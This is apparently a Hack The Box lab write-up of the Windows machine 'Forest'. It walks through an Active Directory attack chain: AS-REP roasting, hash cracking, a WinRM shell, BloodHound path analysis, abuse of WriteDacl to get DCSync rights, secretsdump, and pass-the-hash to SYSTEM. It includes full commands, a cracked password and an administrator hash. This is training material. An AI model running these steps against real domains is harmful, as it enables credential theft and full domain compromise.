This is a write-up for an easy Windows box on hackthebox.eu named Forest. It was a unique box in the sense that there was no web application as an attack surface. We had to exploit a null session to get a hash of a user, which we then use on the box to get a shell. From that shell, we run Bloodhound to get a path to escalate our user account privilege and then use that account to dump secrets, using those secrets we login to the box as administrator.
As usual, we will start with nmap (the IP might be different for you)
ports=$(nmap -p- --min-rate=1000 -T4 10.129.1.77 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports 10.129.1.77
Looking at the results we can see there are multiple ports open
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-31 11:27 EDT
Nmap scan report for 10.129.1.77
Host is up (0.21s latency).PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-31 15:36:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49748/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 2h28m49s, deviation: 4h02m30s, median: 8m48s
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2020-10-31T08:38:59-07:00
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
|_ Message signing enabled and required
| date: 2020-10-31T15:38:58
|_ start_date: 2020-10-31T15:20:47Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 287.87 seconds
We will start with SMB. We will run smbclient and try to list shares
smbclient -L 10.129.1.77
We can see that the anonymous login was successful but no shares were listed.
We will move on to rpcclient and check if we can enumerate some users on the box. We will try to authenticate via null authentication
Funny thing, null authentication helps to enumerate domains as well as users when in use, it was a functionality in Windows Server 2003 and 2008. On later versions it got removed when doing a fresh installation. On upgrading from previous versions of Windows Server the functionality doesn’t get disable as users mught be using this functionality.
rpcclient -U '' 10.129.1.77
And we get a session
Let’s enumerate users
We can see there are a few users which can be useful
You can observe that we did remove a chunk portion of the users, mostly because those are default account or maybe created by programs, so if we were to perform a bruteforce on the box it wouldn't have been possible using these accounts.
Among the users svc-alfresco looks like a service account, we are guessing that from the naming convention of the account. We can confirm this on rpcclient by running the following queries.
As we move on we don't have anything solid on the box so we will use impacket tools. We will be using GetNPUsers.py. What this does is it gets all the users that don't require a Keberos pre-authentication and we can extract their TGTs.
We copy the script to our working directory and run the command
python3 GetNPUsers.py -dc-ip 10.129.1.77 -request 'htb.local/' -format hashcat
And we get a user account dumped. We specify the format as hashcat so that we can use the dump in hashcat.
Now, as we have a user and its hash let’s see if we can crack the hash and get into the box.
Let’s run hashcat
hashcat -m 18200 forest-hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
And looking at the results we can see that we have cracked the password and it is ‘s3rvice’
We have already seen in the nmap output that port 5985 is open. We can try to connect via winrm and try to get a shell. We will be using evil-winrm to connect.
evil-winrm -i 10.129.1.77 -u svc-alfresco -p s3rvice
And we get a shell
We have a lower privilege service account on the system, we need to escalate our privilege.
We will start with BloodHound. To do this we will host an HTTP server to load our ShardHound script on the victim's machine, create a smb share so that we can extract output from BloodHound to our local machine.
Let’s start with starting the python HTTP webserver
sudo python3 -m http.server 80
Let’s create the smbshare, on our local machine. We will be using impacket-smbserver
sudo impacket-smbserver tmp $(pwd) -smb2support -user miku -password password
Now, we have to create a new PSDrive to connect to the share for that we need to put the password in a credential object. We run the following commands on the shell
$pass = convertto-securestring 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('miku', $pass)
Now to connect,
New-PSDrive -Name miku -PSProvider FileSystem -Credential $cred -Root \\10.10.14.41\tmp
From the output we can confirm our PSDrive was created.
Let’s load script on the victim’s machine and run it.
After BloodHound finishes we will have a zip file containing the results. We will copy this file to the PSDrive.
xcopy 'C:\Users\svc-alfresco\Documents\20201031104759_BloodHound.zip' .
We need to run BloodHound now and check for paths to escalate our privilege.
First we will start our neo4j console and then start BloodHound.
We now put the zipfile in the bloodhound window and it should be analyzed in a while.
Once the zip file gets analyzed, let’s find out user and mark it as owned
Looking for the paths, we start from Shortest Path on the Owned Principal. It shows that svc-alfresco is a member of Service Accounts, Service Accounts is a member of Privileged IT Accounts, which is a member of Account Operators. Account Operators is a member of Exchage Windows Permissions. Exchange Windows Permissions has WriteDacl permission on HTB.LOCAL.
The Account Operators group grants limited account creation privileges to a user. Members of this group can create and modify most types of accounts, including those of users, local groups, and global groups, and members can log in locally to domain controllers.
Members of the Account Operators group cannot manage the Administrator user account, the user accounts of administrators, or the Administrators, Server Operators, Account Operators, Backup Operators, or Print Operators groups. Members of this group cannot modify user rights.
We can abuse WriteDacl on the domain object to grant us DCSync rights on HTB.LOCAL.
To abuse this we will create a new user first, in order to keep the current account safe, if we ever need it. To create a user
net user miku miku@123 /add /domain
Now, we will make add it to the group of Exchange Windows Permissions
net group "Exchange Windows Permissions" /add miku
Now, with the help of PowerView we will abuse the WriteDacl, PowerView is a part of PowerSploit. We can download it from github. Otherwise we can just copy the PowerView.ps1 script to our web server directory and again load the script on the remote shell. To load the script on the shell we will run
We will again create a credential object for our password and credential. This time for the user we created
$pass = convertto-securestring 'miku@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('HTB\miku', $pass)
Now, we run the following command to grant us DCSync rights on our account
Add-DomainObjectAcl -Credential $cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity miku -Rights DCSync
After we have the rights we will dump the secrets from the machine and use the secrets to login as administrator.
To dump the secrets we will use another impacket tool secretsdump.py. If this runs successfully that means our rights were assigned successfully and secrets will get dumped.
python3 secretsdump.py htb.local/miku:miku@email@example.com
Looking at the output we have a quite a lot of secrets dumped.
Now, we will use crackmapexec to check if our password works or not. To do that run
crackmapexec smb 10.129.1.77 -u administrator -H aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
And we can see that it shows Pwn3d!, this means we can get a shell from the account.
We will use another impacket tool psexec to connect to the machine.
python3 psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 firstname.lastname@example.org
Voila! We get a shell back, running “whoami” we get that we have the shell as “nt authority\system”.
Hope you liked this write-up on Forest from hackthebox. Comments and Claps are appreciated.